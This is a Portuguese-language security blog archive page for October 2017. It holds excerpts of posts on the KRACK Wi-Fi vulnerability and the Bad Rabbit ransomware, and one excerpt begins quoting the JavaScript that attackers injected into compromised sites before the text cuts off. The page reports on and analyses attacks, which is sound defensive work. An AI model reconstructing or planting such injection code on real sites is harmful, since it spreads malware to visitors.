Pular para o conteúdo principal

Postagens

Mostrando postagens de outubro, 2017

Falha grave afeta todas as redes WiFi

A maioria das vulnerabilidades passa despercebida pela maioria da população mundial, mesmo que afetem vários milhões de pessoas. Mas esta notícia é particularmente grande: pesquisadores encontraram um monte de vulnerabilidades que tornam insegura todas as redes WiFi. Um  artigo  descreve como praticamente qualquer rede Wi-Fi que dependa da criptografia WPA ou WPA2 pode ser comprometida. E com o WPA sendo o padrão do WiFi moderno, isso significa que praticamente todas as redes wireless são vulneráveis. A pesquisa é bastante complicada, então não vamos analisá-la em detalhes e destacaremos somente as principais descobertas. Como o KRACK funciona Os pesquisadores descobriram que os dispositivos baseados em Android, iOS, Linux, MacOS, Windows e alguns outros sistemas operacionais são vulneráveis ​​a alguma variação desse ataque e isso significa que quase qualquer dispositivo pode ser comprometido. Eles chamaram esse tipo de ataque de  reinstalação de chave , ou  KRACK . Em part
Postar um comentário
Leia mais

Bad Rabbit: nova epidemia de ransomware usa sites contaminados

Já vimos dois ataques em grande escala do Ransomware este ano –  WannaCry  e  ExPetr  (também conhecido como Petya e NotPetya). Parece que um terceiro ataque está em ascensão: o malware Bad Rabbit – nome indicado pelo site darknet citado na nota de resgate. O que se sabe até agora é que o Bad Rabbit infectou vários grandes meios de comunicação russos, como as agências de notícias Interfax e Fontanka.ru. O Aeroporto Internacional de Odessa (Ucrânia) informou sobre um ataque cibernético em seu sistema de informação. Os criminosos por trás do ataque Bad Rabbit estão exigindo 0,05 bitcoin como resgate – aproximadamente US$ 280 à taxa de câmbio atual. De acordo com nossas descobertas, o ataque não usa  exploits . É um ataque drive-by: as vítimas baixam um falso instalador do Adobe Flash de sites infectados e iniciam manualmente o arquivo . exe , infectando-se assim. Nossos pesquisadores detectaram uma série de sites comprometidos, todas de notícias ou de mídia. Se é possível recuper
Postar um comentário
Leia mais

Bad Rabbit: o ransomware Not-Petya está de volta e com algumas melhorias

Um novo surto de ransomware atacou essa semana a grandes infraestruturas na Ucrânia, incluindo o Metrô de Kiev. Assim como prometemos, realizamos uma análise mais detalhada e a seguir apresentamos os resultados desta nova variante do Diskcoder.D. Drive-by download via watering hole em sites populares Um dos métodos de distribuição do Bad Rabbit é um drive-by download. Alguns sites populares são comprometidos e neles se injeta JavaScript no HTML ou em um de seus arquivos .js. Aqui está uma versão pólida da injeção: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 function e ( d ) {    var xhr = null ;    if ( ! ! window . XMLHttpRequest ) {      xhr = new XMLHttpRequest ( ) ;    } else if ( ! ! window . ActiveXObject ) {      var xhrs = [ 'Microsoft.
Postar um comentário
Leia mais